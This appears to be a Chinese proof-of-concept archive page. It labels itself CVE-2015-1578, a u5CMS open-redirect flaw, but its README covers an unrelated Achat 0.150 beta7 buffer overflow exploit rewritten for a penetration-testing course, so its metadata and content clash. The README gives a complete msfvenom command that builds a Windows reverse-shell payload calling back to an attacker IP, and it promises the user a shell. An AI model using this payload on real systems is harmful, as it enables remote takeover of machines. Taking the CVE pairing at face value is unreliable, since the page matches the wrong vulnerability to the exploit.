关联漏洞
标题:
u5CMS 开放重定向漏洞
(CVE-2015-1578)
描述:u5CMS是一套基于PHP、MySQL和Apache的且用于中型网站、会议、审核流程、PayPal支付和在线调查的内容管理系统(CMS)。该系统支持所见即所得编辑器、创建调查表单和数据存储等。 u5CMS 3.9.4之前版本中存在开放重定向漏洞。远程攻击者可借助u5admin/pidvesa.php脚本的pidvesa cookie或u5admin/meta2.php脚本的‘uri’参数利用该漏洞将用户重定向到任意Web网站,实施钓鱼攻击。
描述
Achat 0.150 beta7 - Remote Buffer Overflow Rewrite for python3 for the PNPT course.
介绍
# CVE-2015-1578
Achat 0.150 beta7 - Remote Buffer Overflow Rewrite for python3 for the PNPT course.
Original: Author KAhara MAnhara
Rewritten: in python3 by Giuseppe Aloisi
Achat 0.150 beta7 - Buffer Overflow
Tested on Windows 7 32bit
https://www.exploit-db.com/exploits/36025
give the script a few seconds to give you a reverse shell...
#Run the msfvenom command In the code
msfvenom -a x86 --platform Windows lhost=10.10.14.4 lport=4444 -p windows/shell_reverse_tcp -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Change the server IP to the correct IP address of your target
文件快照
[4.0K] /data/pocs/f1ac95f07cea4f5be4c2f767f03392e3f03db108
├── [2.0K] Achat 0.150 beta7 - Remote Buffer Overflow
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。